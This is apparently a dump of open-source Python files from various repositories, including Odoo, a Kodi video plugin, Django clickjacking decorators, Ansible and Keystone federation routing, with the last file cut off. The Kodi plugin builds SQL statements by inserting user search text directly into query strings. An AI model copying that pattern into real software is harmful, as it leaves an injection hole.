repo_name stringlengths 5 100 | path stringlengths 4 375 | copies stringclasses 991 values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15 values |
|---|---|---|---|---|---|
luiseduardohdbackup/odoo | addons/sale_order_dates/__openerp__.py | 260 | 1771 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Dates on Sales Order',
'version': '1.1',
'category': 'Sales Management',
'description': """
Add additional date information to the sales order.
===================================================
You can add the following additional dates to a sales order:
------------------------------------------------------------
* Requested Date (will be used as the expected date on pickings)
* Commitment Date
* Effective Date
""",
'author': 'OpenERP SA',
'website': 'https://www.odoo.com/page/crm',
'depends': ['sale_stock'],
'data': ['sale_order_dates_view.xml'],
'demo': [],
'test': ['test/requested_date.yml'],
'installable': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
chimkentec/KodiMODo_rep | plugin.video.zona.mobi.dev/core/list.py | 2 | 12957 | # -*- coding: utf-8 -*-
import os, re, sys, json, urllib, hashlib, traceback
import xbmcup.app, xbmcup.db, xbmcup.system, xbmcup.net, xbmcup.parser, xbmcup.gui
import xbmc, cover, xbmcplugin, xbmcgui
from http import HttpData
from common import Render
from defines import *
try:
from sqlite3 import dbapi2 as sqlite
except:
from pysqlite2 import dbapi2 as sqlite
CACHE = xbmcup.db.Cache(xbmcup.system.fs('sandbox://'+CACHE_DATABASE))
SQL = xbmcup.db.SQL(xbmcup.system.fs('sandbox://'+CACHE_DATABASE))
class AbstactList(xbmcup.app.Handler, HttpData, Render):
def add_movies(self, response, ifempty=30111):
if(len(response['data']) > 0):
for movie in response['data']:
menu = []
self.item(movie['name']+' '+movie['year']+' '+movie['rating'],
self.link('quality-list', {'movie_page' : movie['url'], 'cover' : movie['img']}),
folder=True, cover=movie['img'], menu=menu)
else:
self.item(u'[COLOR red]['+xbmcup.app.lang[ifempty]+'][/COLOR]', self.link('null'), folder=False, cover=cover.info)
class MovieList(AbstactList):
def handle(self):
params = self.argv[0]
try:
page = int(params['page'])
except:
params['page'] = 0
page = 0
if(params['dir']):
page_url = "/"+params['dir']+"/"
else:
page_url = '/'
md5 = hashlib.md5()
if(page_url == '/'):
md5.update(page_url+'/page/'+params['sub_dir'])
response = CACHE(str(md5.hexdigest()), self.get_movies, page_url, page, params['sub_dir'], False, '', 'vlist-item')
else:
md5.update(page_url+'/page/'+str(page))
response = CACHE(str(md5.hexdigest()), self.get_movies, page_url, page)
if(response['page']['pagenum'] > 1):
params['page'] = page-1
self.item('[COLOR green]'+xbmcup.app.lang[30106]+'[/COLOR]', self.replace('list', params), folder=True, cover=cover.prev)
params['page'] = page+1
self.add_movies(response)
params['page'] = page+1
if(response['page']['maxpage'] >= response['page']['pagenum']+1):
self.item('[COLOR green]'+xbmcup.app.lang[30107]+'[/COLOR]', self.replace('list', params), folder=True, cover=cover.next)
class SearchList(AbstactList):
def handle(self):
try:
params = self.argv[0]
except:
params = {}
try:
page = int(params['page'])
except:
params['page'] = 0
page = 0
history = []
try:
req_count = int(xbmcup.app.setting['search_history'])
except:
req_count = 0
try:
usersearch = params['usersearch']
vsearch = params['vsearch']
except:
history = []
if(req_count > 0):
SQL.set('create table if not exists search(id INTEGER PRIMARY KEY AUTOINCREMENT, value varchar(255) unique)')
history = SQL.get('SELECT id,value FROM search ORDER BY ID DESC')
else:
SQL.set('DELETE FROM search')
if(len(history)):
history = list(history)
values = ['[COLOR yellow]'+xbmcup.app.lang[30108]+'[/COLOR]']
for item in history:
values.append(item[1])
ret = xbmcup.gui.select(xbmcup.app.lang[30161], values)
if ret == None:
return
if(ret > 0):
usersearch = values[ret]
vsearch = usersearch.encode('utf-8').decode('utf-8')
params['vsearch'] = vsearch
params['usersearch'] = urllib.quote_plus(usersearch.encode('utf-8'))
else:
params['vsearch'] = ''
else:
params['vsearch'] = ''
if(params['vsearch'] == ''):
keyboard = xbmc.Keyboard()
keyboard.setHeading(xbmcup.app.lang[30112])
keyboard.doModal()
usersearch = keyboard.getText(0)
vsearch = usersearch.decode('utf-8')
params['vsearch'] = vsearch
params['usersearch'] = urllib.quote_plus(usersearch)
if not usersearch: return
try:
SQL.set('INSERT INTO search (value) VALUES ("%s")' % (vsearch))
except sqlite.IntegrityError:
SQL.set('DELETE FROM search WHERE `value` = "%s"' % (vsearch))
SQL.set('INSERT INTO search (value) VALUES ("%s")' % (vsearch))
except:
pass
if(len(history) >= req_count):
SQL.set('DELETE FROM search WHERE `id` = (SELECT MIN(id) FROM search)')
#page_url = "search/index/index/usersearch/"+params['usersearch']
page_url = "search/%s" % (params['usersearch'])
md5 = hashlib.md5()
#md5.update(page_url+'/page/'+str(page))
md5.update(page_url+'?page='+str(page))
response = CACHE(str(md5.hexdigest()), self.get_movies, page_url, page, '', False, usersearch)
self.item(u'[COLOR yellow]'+xbmcup.app.lang[30108]+'[/COLOR]', self.link('search'), folder=True, cover=cover.search)
self.item('[COLOR blue]['+xbmcup.app.lang[30109]+': '+vsearch+'][/COLOR]',
self.link('null'), folder=False, cover=cover.info)
if(response['page']['pagenum'] > 1):
params['page'] = page-1
self.item('[COLOR green]'+xbmcup.app.lang[30106]+'[/COLOR]', self.replace('search', params), folder=True, cover=cover.prev)
params['page'] = page+1
self.add_movies(response)
params['page'] = page+1
if(response['page']['maxpage'] >= response['page']['pagenum']+1):
self.item(u'[COLOR green]'+xbmcup.app.lang[30107]+'[/COLOR]', self.replace('search', params), folder=True, cover=cover.next)
class AbstractViewer(AbstactList):
def get_info(self):
return {
'Genre' : self.movieInfo['genres'],
'year' : self.movieInfo['year'],
'director' : self.movieInfo['director'],
'rating' : self.movieInfo['ratingValue'],
'duration' : self.movieInfo['durarion'],
'votes' : self.movieInfo['ratingCount'],
'plot' : self.movieInfo['description'],
'title' : self.movieInfo['title'],
'originaltitle' : self.movieInfo['title']
# 'playcount' : 1,
# 'date': '%d.%m.%Y',
# 'count' : 12
}
def add_playable_item(self, movie, resolution):
try:
name = movie[1]
except:
name = os.path.basename(str(movie[0]))
if(movie[0].find('http://') == -1):
link = self.resolve('resolve', {'movie' : movie, 'quality': resolution})
else:
link = movie[0]
self.item(name,
link,
folder=False,
media='video',
info=self.get_info(),
cover = self.movieInfo['cover'],
fanart = self.movieInfo['fanart']
)
def get_icon(self, quality):
if(quality in cover.res_icon):
return cover.res_icon[quality]
else:
return cover.res_icon['default']
class QualityList(AbstractViewer):
def handle(self):
self.params = self.argv[0]
try:
self.movieInfo = self.params['movieInfo']
except:
self.movieInfo = self.get_movie_info(self.params['movie_page'])
try:
self.params['sub_dir'] = int(self.params['sub_dir'])
except:
self.params['sub_dir'] = None
#quality_settings = int(xbmcup.app.setting['quality'])
#default_quality = QUALITYS[quality_settings]
try:
self.params['quality_dir'] = int(self.params['quality_dir'])
except:
self.params['quality_dir'] = None
if(self.params['sub_dir'] == None):
self.def_dir = 0
else:
self.def_dir= self.params['sub_dir']
# if(default_quality != None and self.params['quality_dir'] == None):
# try:
# test = self.movieInfo['movies'][self.def_dir]['movies'][default_quality]
# self.params['quality_dir'] = str(default_quality)
# except:
# if(xbmcup.app.setting['lowest_quality'] == 'true'):
# quality_settings -= 1
# if(quality_settings > 1):
# try:
# default_quality = str(QUALITYS[quality_settings])
# test = self.movieInfo['movies'][self.def_dir]['movies'][default_quality]
# self.params['quality_dir'] = default_quality
# except:
# quality_settings -= 1
# if(quality_settings > 1):
# try:
# default_quality = str(QUALITYS[quality_settings])
# test = self.movieInfo['movies'][self.def_dir]['movies'][default_quality]
# self.params['quality_dir'] = default_quality
# except:
# pass
#если на сайте несколько папок с файлами
if((len(self.movieInfo['movies']) > 1 and self.params['sub_dir'] == None) or self.movieInfo['no_files'] != None):
self.show_folders()
#если эпизоды есть в разном качествве
elif(self.movieInfo['episodes'] == True and
len(self.movieInfo['movies'][self.def_dir]['movies']) > 1 and
self.params['quality_dir'] == None):
self.show_quality_folder()
elif(self.movieInfo['episodes'] == True):
self.show_episodes()
def show_folders(self):
if(self.movieInfo['no_files'] == None):
i = 0
for movie in self.movieInfo['movies']:
self.item(movie['folder_title'],
self.link('quality-list',
{
'sub_dir' : i,
'movieInfo' : self.movieInfo
}
),
folder=True,
cover = self.movieInfo['cover']
)
i = i+1
else:
self.item(u'[COLOR red]['+self.movieInfo['no_files'].decode('utf-8')+'][/COLOR]', self.link('null'), folder=False, cover=cover.info)
def show_episodes(self):
show_first_quality = False
if(self.movieInfo['movies'][self.def_dir]['isSerial']):
curl = self.movieInfo['movies'][self.def_dir]['folder_url']
md5 = hashlib.md5()
md5.update(curl)
self.movieInfo['movies'][self.def_dir]['movies'] = CACHE(str(md5.hexdigest()), self.get_season_movies, curl)
print self.movieInfo['movies'][self.def_dir]['movies']
if(self.params['quality_dir']):
movies = self.movieInfo['movies'][self.def_dir]['movies'][str(self.params['quality_dir'])]
else:
show_first_quality = True
movies = self.movieInfo['movies'][self.def_dir]['movies']
if(show_first_quality):
for quality in movies:
for movie in movies[quality]:
self.add_playable_item(movie, str(self.params['quality_dir']))
break
else:
for movie in movies:
self.add_playable_item(movie, str(self.params['quality_dir']))
self.render_items()
def show_quality_folder(self):
if(len(self.movieInfo['movies']) > 1):
movies = self.movieInfo['movies'][self.params['sub_dir']]['movies']
else:
movies = self.movieInfo['movies'][0]['movies']
resolutions = []
for movie in movies:
resolutions.append(int(movie))
resolutions.sort()
for movie in resolutions:
self.item((str(movie) if movie != 0 else 'FLV'),
self.link('quality-list',
{
'sub_dir' : self.params['sub_dir'],
'quality_dir' : str(movie),
'movieInfo' : self.movieInfo
}
),
folder=True,
cover=self.get_icon(str(movie))
)
| gpl-3.0 |
gholms/euca2ools | euca2ools/commands/ec2/deletevpngateway.py | 5 | 1643 | # Copyright 2014 Eucalyptus Systems, Inc.
#
# Redistribution and use of this software in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from requestbuilder import Arg
from euca2ools.commands.ec2 import EC2Request
class DeleteVpnGateway(EC2Request):
DESCRIPTION = 'Delete a virtual private gateway'
ARGS = [Arg('VpnGatewayId', metavar='VGATEWAY',
help='ID of the virtual private gateway to delete (required)')]
| bsd-2-clause |
ArcherSys/ArcherSys | Lib/site-packages/django/views/decorators/clickjacking.py | 550 | 1759 | from functools import wraps
from django.utils.decorators import available_attrs
def xframe_options_deny(view_func):
"""
Modifies a view function so its response has the X-Frame-Options HTTP
header set to 'DENY' as long as the response doesn't already have that
header set.
e.g.
@xframe_options_deny
def some_view(request):
...
"""
def wrapped_view(*args, **kwargs):
resp = view_func(*args, **kwargs)
if resp.get('X-Frame-Options', None) is None:
resp['X-Frame-Options'] = 'DENY'
return resp
return wraps(view_func, assigned=available_attrs(view_func))(wrapped_view)
def xframe_options_sameorigin(view_func):
"""
Modifies a view function so its response has the X-Frame-Options HTTP
header set to 'SAMEORIGIN' as long as the response doesn't already have
that header set.
e.g.
@xframe_options_sameorigin
def some_view(request):
...
"""
def wrapped_view(*args, **kwargs):
resp = view_func(*args, **kwargs)
if resp.get('X-Frame-Options', None) is None:
resp['X-Frame-Options'] = 'SAMEORIGIN'
return resp
return wraps(view_func, assigned=available_attrs(view_func))(wrapped_view)
def xframe_options_exempt(view_func):
"""
Modifies a view function by setting a response variable that instructs
XFrameOptionsMiddleware to NOT set the X-Frame-Options HTTP header.
e.g.
@xframe_options_exempt
def some_view(request):
...
"""
def wrapped_view(*args, **kwargs):
resp = view_func(*args, **kwargs)
resp.xframe_options_exempt = True
return resp
return wraps(view_func, assigned=available_attrs(view_func))(wrapped_view)
| mit |
MaximNevrov/neutron | neutron/db/migration/alembic_migrations/versions/mitaka/expand/13cfb89f881a_add_is_default_to_subnetpool.py | 9 | 1141 | # Copyright 2015 Cisco Systems
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""add is_default to subnetpool
Revision ID: 13cfb89f881a
Revises: 59cb5b6cf4d
Create Date: 2015-09-30 15:58:31.170153
"""
# revision identifiers, used by Alembic.
revision = '13cfb89f881a'
down_revision = '59cb5b6cf4d'
from alembic import op
import sqlalchemy as sa
from sqlalchemy import sql
def upgrade():
op.add_column('subnetpools',
sa.Column('is_default',
sa.Boolean(),
server_default=sql.false(),
nullable=False))
| apache-2.0 |
openlabs/nereid | trytond_nereid/tests/test_website.py | 6 | 2763 | # This file is part of Tryton & Nereid. The COPYRIGHT file at the top level of
# this repository contains the full copyright notices and license terms.
import unittest
import json
import trytond.tests.test_tryton
from trytond.tests.test_tryton import POOL, USER, DB_NAME, CONTEXT
from trytond.transaction import Transaction
from nereid.testing import NereidTestCase
class TestWebsite(NereidTestCase):
'Test Website'
def setUp(self):
trytond.tests.test_tryton.install_module('nereid')
self.NereidWebsite = POOL.get('nereid.website')
self.NereidWebsiteLocale = POOL.get('nereid.website.locale')
self.NereidPermission = POOL.get('nereid.permission')
self.NereidUser = POOL.get('nereid.user')
self.Company = POOL.get('company.company')
self.Currency = POOL.get('currency.currency')
self.Language = POOL.get('ir.lang')
self.Party = POOL.get('party.party')
def setup_defaults(self):
"""
Setup the defaults
"""
usd, = self.Currency.create([{
'name': 'US Dollar',
'code': 'USD',
'symbol': '$',
}])
self.party, = self.Party.create([{
'name': 'Openlabs',
}])
self.company, = self.Company.create([{
'party': self.party,
'currency': usd,
}])
en_us, = self.Language.search([('code', '=', 'en_US')])
currency, = self.Currency.search([('code', '=', 'USD')])
locale, = self.NereidWebsiteLocale.create([{
'code': 'en_US',
'language': en_us,
'currency': currency,
}])
self.NereidWebsite.create([{
'name': 'localhost',
'company': self.company,
'application_user': USER,
'default_locale': locale,
}])
def test_0010_user_status(self):
"""
Test that user status returns jsonified object on POST
request.
"""
with Transaction().start(DB_NAME, USER, context=CONTEXT):
self.setup_defaults()
app = self.get_app()
with app.test_client() as c:
rv = c.get('/user_status')
self.assertEqual(rv.status_code, 200)
rv = c.post('/user_status')
data = json.loads(rv.data)
self.assertEqual(data['status']['logged_id'], False)
self.assertEqual(data['status']['messages'], [])
def suite():
"Nereid test suite"
test_suite = unittest.TestSuite()
test_suite.addTests(
unittest.TestLoader().loadTestsFromTestCase(TestWebsite)
)
return test_suite
if __name__ == '__main__':
unittest.TextTestRunner(verbosity=2).run(suite())
| gpl-3.0 |
mbauskar/omnitech-demo-erpnext | erpnext/hr/doctype/holiday_list/holiday_list.py | 41 | 1984 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils import cint
from frappe.model.naming import make_autoname
from frappe import throw, _
from frappe.model.document import Document
class HolidayList(Document):
def validate(self):
self.update_default_holiday_list()
def get_weekly_off_dates(self):
self.validate_values()
yr_start_date, yr_end_date = self.get_fy_start_end_dates()
date_list = self.get_weekly_off_date_list(yr_start_date, yr_end_date)
last_idx = max([cint(d.idx) for d in self.get("holidays")] or [0,])
for i, d in enumerate(date_list):
ch = self.append('holidays', {})
ch.description = self.weekly_off
ch.holiday_date = d
ch.idx = last_idx + i + 1
def validate_values(self):
if not self.fiscal_year:
throw(_("Please select Fiscal Year"))
if not self.weekly_off:
throw(_("Please select weekly off day"))
def get_fy_start_end_dates(self):
return frappe.db.sql("""select year_start_date, year_end_date
from `tabFiscal Year` where name=%s""", (self.fiscal_year,))[0]
def get_weekly_off_date_list(self, year_start_date, year_end_date):
from frappe.utils import getdate
year_start_date, year_end_date = getdate(year_start_date), getdate(year_end_date)
from dateutil import relativedelta
from datetime import timedelta
import calendar
date_list = []
weekday = getattr(calendar, (self.weekly_off).upper())
reference_date = year_start_date + relativedelta.relativedelta(weekday=weekday)
while reference_date <= year_end_date:
date_list.append(reference_date)
reference_date += timedelta(days=7)
return date_list
def clear_table(self):
self.set('holidays', [])
def update_default_holiday_list(self):
frappe.db.sql("""update `tabHoliday List` set is_default = 0
where ifnull(is_default, 0) = 1 and fiscal_year = %s""", (self.fiscal_year,))
| agpl-3.0 |
damonkohler/sl4a | python/src/Mac/Modules/launch/launchsupport.py | 39 | 3391 | # This script generates a Python interface for an Apple Macintosh Manager.
# It uses the "bgen" package to generate C code.
# The function specifications are generated by scanning the mamager's header file,
# using the "scantools" package (customized for this particular manager).
import string
# Declarations that change for each manager
MODNAME = '_Launch' # The name of the module
OBJECTNAME = 'UNUSED' # The basic name of the objects used here
KIND = 'Record' # Usually 'Ptr' or 'Handle'
# The following is *usually* unchanged but may still require tuning
MODPREFIX = 'Launch' # The prefix for module-wide routines
OBJECTTYPE = OBJECTNAME + KIND # The C type used to represent them
OBJECTPREFIX = MODPREFIX + 'Obj' # The prefix for object methods
INPUTFILE = string.lower(MODPREFIX) + 'gen.py' # The file generated by the scanner
OUTPUTFILE = MODNAME + "module.c" # The file generated by this program
from macsupport import *
# Create the type objects
LSAcceptanceFlags = Type("LSAcceptanceFlags", "l")
LSInitializeFlags = Type("LSInitializeFlags", "l")
LSRequestedInfo = Type("LSRequestedInfo", "l")
LSRolesMask = Type("LSRolesMask", "l")
UniCharCount = Type("UniCharCount", "l")
OptCFStringRef = OpaqueByValueType("CFStringRef", "OptCFStringRefObj")
LSItemInfoRecord = OpaqueType("LSItemInfoRecord", "LSItemInfoRecord")
includestuff = includestuff + """
#if PY_VERSION_HEX < 0x02040000
PyObject *PyMac_GetOSErrException(void);
#endif
#include <ApplicationServices/ApplicationServices.h>
/*
** Optional CFStringRef. None will pass NULL
*/
static int
OptCFStringRefObj_Convert(PyObject *v, CFStringRef *spec)
{
if (v == Py_None) {
*spec = NULL;
return 1;
}
return CFStringRefObj_Convert(v, spec);
}
PyObject *
OptCFStringRefObj_New(CFStringRef it)
{
if (it == NULL) {
Py_INCREF(Py_None);
return Py_None;
}
return CFStringRefObj_New(it);
}
/*
** Convert LSItemInfoRecord to Python.
*/
PyObject *
LSItemInfoRecord_New(LSItemInfoRecord *it)
{
return Py_BuildValue("{s:is:O&s:O&s:O&s:O&s:i}",
"flags", it->flags,
"filetype", PyMac_BuildOSType, it->filetype,
"creator", PyMac_BuildOSType, it->creator,
"extension", OptCFStringRefObj_New, it->extension,
"iconFileName", OptCFStringRefObj_New, it->iconFileName,
"kindID", it->kindID);
}
"""
# From here on it's basically all boiler plate...
execfile(string.lower(MODPREFIX) + 'typetest.py')
# Create the generator groups and link them
module = MacModule(MODNAME, MODPREFIX, includestuff, finalstuff, initstuff)
##object = MyObjectDefinition(OBJECTNAME, OBJECTPREFIX, OBJECTTYPE)
##module.addobject(object)
# Create the generator classes used to populate the lists
Function = OSErrFunctionGenerator
##Method = OSErrMethodGenerator
# Create and populate the lists
functions = []
##methods = []
execfile(INPUTFILE)
# add the populated lists to the generator groups
# (in a different wordl the scan program would generate this)
for f in functions: module.add(f)
##for f in methods: object.add(f)
# generate output (open the output file as late as possible)
SetOutputFileName(OUTPUTFILE)
module.generate()
| apache-2.0 |
direvus/ansible | lib/ansible/modules/cloud/openstack/os_keystone_service.py | 34 | 5676 | #!/usr/bin/python
# Copyright 2016 Sam Yaple
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: os_keystone_service
short_description: Manage OpenStack Identity services
extends_documentation_fragment: openstack
author: "Sam Yaple (@SamYaple)"
version_added: "2.2"
description:
- Create, update, or delete OpenStack Identity service. If a service
with the supplied name already exists, it will be updated with the
new description and enabled attributes.
options:
name:
description:
- Name of the service
required: true
description:
description:
- Description of the service
enabled:
description:
- Is the service enabled
type: bool
default: 'yes'
service_type:
description:
- The type of service
required: true
state:
description:
- Should the resource be present or absent.
choices: [present, absent]
default: present
availability_zone:
description:
- Ignored. Present for backwards compatibility
requirements:
- "python >= 2.7"
- "openstacksdk"
'''
EXAMPLES = '''
# Create a service for glance
- os_keystone_service:
cloud: mycloud
state: present
name: glance
service_type: image
description: OpenStack Image Service
# Delete a service
- os_keystone_service:
cloud: mycloud
state: absent
name: glance
service_type: image
'''
RETURN = '''
service:
description: Dictionary describing the service.
returned: On success when I(state) is 'present'
type: complex
contains:
id:
description: Service ID.
type: string
sample: "3292f020780b4d5baf27ff7e1d224c44"
name:
description: Service name.
type: string
sample: "glance"
service_type:
description: Service type.
type: string
sample: "image"
description:
description: Service description.
type: string
sample: "OpenStack Image Service"
enabled:
description: Service status.
type: boolean
sample: True
id:
description: The service ID.
returned: On success when I(state) is 'present'
type: string
sample: "3292f020780b4d5baf27ff7e1d224c44"
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.openstack import openstack_full_argument_spec, openstack_module_kwargs, openstack_cloud_from_module
def _needs_update(module, service):
if service.enabled != module.params['enabled']:
return True
if service.description is not None and \
service.description != module.params['description']:
return True
return False
def _system_state_change(module, service):
state = module.params['state']
if state == 'absent' and service:
return True
if state == 'present':
if service is None:
return True
return _needs_update(module, service)
return False
def main():
argument_spec = openstack_full_argument_spec(
description=dict(default=None),
enabled=dict(default=True, type='bool'),
name=dict(required=True),
service_type=dict(required=True),
state=dict(default='present', choices=['absent', 'present']),
)
module_kwargs = openstack_module_kwargs()
module = AnsibleModule(argument_spec,
supports_check_mode=True,
**module_kwargs)
description = module.params['description']
enabled = module.params['enabled']
name = module.params['name']
state = module.params['state']
service_type = module.params['service_type']
sdk, cloud = openstack_cloud_from_module(module)
try:
services = cloud.search_services(name_or_id=name,
filters=dict(type=service_type))
if len(services) > 1:
module.fail_json(msg='Service name %s and type %s are not unique' %
(name, service_type))
elif len(services) == 1:
service = services[0]
else:
service = None
if module.check_mode:
module.exit_json(changed=_system_state_change(module, service))
if state == 'present':
if service is None:
service = cloud.create_service(name=name, description=description,
type=service_type, enabled=True)
changed = True
else:
if _needs_update(module, service):
service = cloud.update_service(
service.id, name=name, type=service_type, enabled=enabled,
description=description)
changed = True
else:
changed = False
module.exit_json(changed=changed, service=service, id=service.id)
elif state == 'absent':
if service is None:
changed = False
else:
cloud.delete_service(service.id)
changed = True
module.exit_json(changed=changed)
except sdk.exceptions.OpenStackCloudException as e:
module.fail_json(msg=str(e))
if __name__ == '__main__':
main()
| gpl-3.0 |
klmitch/keystone | keystone/federation/routers.py | 3 | 10198 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
from keystone.common import json_home
from keystone.common import wsgi
from keystone.federation import controllers
build_resource_relation = functools.partial(
json_home.build_v3_extension_resource_relation,
extension_name='OS-FEDERATION', extension_version='1.0')
build_parameter_relation = functools.partial(
json_home.build_v3_extension_parameter_relation,
extension_name='OS-FEDERATION', extension_version='1.0')
IDP_ID_PARAMETER_RELATION = build_parameter_relation(parameter_name='idp_id')
PROTOCOL_ID_PARAMETER_RELATION = build_parameter_relation(
parameter_name='protocol_id')
SP_ID_PARAMETER_RELATION = build_parameter_relation(parameter_name='sp_id')
class Routers(wsgi.RoutersBase):
"""API Endpoints for the Federation extension.
The API looks like::
PUT /OS-FEDERATION/identity_providers/{idp_id}
GET /OS-FEDERATION/identity_providers
GET /OS-FEDERATION/identity_providers/{idp_id}
DELETE /OS-FEDERATION/identity_providers/{idp_id}
PATCH /OS-FEDERATION/identity_providers/{idp_id}
PUT /OS-FEDERATION/identity_providers/
{idp_id}/protocols/{protocol_id}
GET /OS-FEDERATION/identity_providers/
{idp_id}/protocols
GET /OS-FEDERATION/identity_providers/
{idp_id}/protocols/{protocol_id}
PATCH /OS-FEDERATION/identity_providers/
{idp_id}/protocols/{protocol_id}
DELETE /OS-FEDERATION/identity_providers/
{idp_id}/protocols/{protocol_id}
PUT /OS-FEDERATION/mappings
GET /OS-FEDERATION/mappings
PATCH /OS-FEDERATION/mappings/{mapping_id}
GET /OS-FEDERATION/mappings/{mapping_id}
DELETE /OS-FEDERATION/mappings/{mapping_id}
GET /OS-FEDERATION/projects
GET /OS-FEDERATION/domains
PUT /OS-FEDERATION/service_providers/{sp_id}
GET /OS-FEDERATION/service_providers
GET /OS-FEDERATION/service_providers/{sp_id}
DELETE /OS-FEDERATION/service_providers/{sp_id}
PATCH /OS-FEDERATION/service_providers/{sp_id}
GET /OS-FEDERATION/identity_providers/{idp_id}/
protocols/{protocol_id}/auth
POST /OS-FEDERATION/identity_providers/{idp_id}/
protocols/{protocol_id}/auth
GET /auth/OS-FEDERATION/identity_providers/
{idp_id}/protocols/{protocol_id}/websso
?origin=https%3A//horizon.example.com
POST /auth/OS-FEDERATION/identity_providers/
{idp_id}/protocols/{protocol_id}/websso
?origin=https%3A//horizon.example.com
POST /auth/OS-FEDERATION/saml2
POST /auth/OS-FEDERATION/saml2/ecp
GET /OS-FEDERATION/saml2/metadata
GET /auth/OS-FEDERATION/websso/{protocol_id}
?origin=https%3A//horizon.example.com
POST /auth/OS-FEDERATION/websso/{protocol_id}
?origin=https%3A//horizon.example.com
"""
def _construct_url(self, suffix):
return "/OS-FEDERATION/%s" % suffix
def append_v3_routers(self, mapper, routers):
auth_controller = controllers.Auth()
idp_controller = controllers.IdentityProvider()
protocol_controller = controllers.FederationProtocol()
mapping_controller = controllers.MappingController()
project_controller = controllers.ProjectAssignmentV3()
domain_controller = controllers.DomainV3()
saml_metadata_controller = controllers.SAMLMetadataV3()
sp_controller = controllers.ServiceProvider()
# Identity Provider CRUD operations
self._add_resource(
mapper, idp_controller,
path=self._construct_url('identity_providers/{idp_id}'),
get_action='get_identity_provider',
put_action='create_identity_provider',
patch_action='update_identity_provider',
delete_action='delete_identity_provider',
rel=build_resource_relation(resource_name='identity_provider'),
path_vars={
'idp_id': IDP_ID_PARAMETER_RELATION,
})
self._add_resource(
mapper, idp_controller,
path=self._construct_url('identity_providers'),
get_action='list_identity_providers',
rel=build_resource_relation(resource_name='identity_providers'))
# Protocol CRUD operations
self._add_resource(
mapper, protocol_controller,
path=self._construct_url('identity_providers/{idp_id}/protocols/'
'{protocol_id}'),
get_action='get_protocol',
put_action='create_protocol',
patch_action='update_protocol',
delete_action='delete_protocol',
rel=build_resource_relation(
resource_name='identity_provider_protocol'),
path_vars={
'idp_id': IDP_ID_PARAMETER_RELATION,
'protocol_id': PROTOCOL_ID_PARAMETER_RELATION,
})
self._add_resource(
mapper, protocol_controller,
path=self._construct_url('identity_providers/{idp_id}/protocols'),
get_action='list_protocols',
rel=build_resource_relation(
resource_name='identity_provider_protocols'),
path_vars={
'idp_id': IDP_ID_PARAMETER_RELATION,
})
# Mapping CRUD operations
self._add_resource(
mapper, mapping_controller,
path=self._construct_url('mappings/{mapping_id}'),
get_action='get_mapping',
put_action='create_mapping',
patch_action='update_mapping',
delete_action='delete_mapping',
rel=build_resource_relation(resource_name='mapping'),
path_vars={
'mapping_id': build_parameter_relation(
parameter_name='mapping_id'),
})
self._add_resource(
mapper, mapping_controller,
path=self._construct_url('mappings'),
get_action='list_mappings',
rel=build_resource_relation(resource_name='mappings'))
# Service Providers CRUD operations
self._add_resource(
mapper, sp_controller,
path=self._construct_url('service_providers/{sp_id}'),
get_action='get_service_provider',
put_action='create_service_provider',
patch_action='update_service_provider',
delete_action='delete_service_provider',
rel=build_resource_relation(resource_name='service_provider'),
path_vars={
'sp_id': SP_ID_PARAMETER_RELATION,
})
self._add_resource(
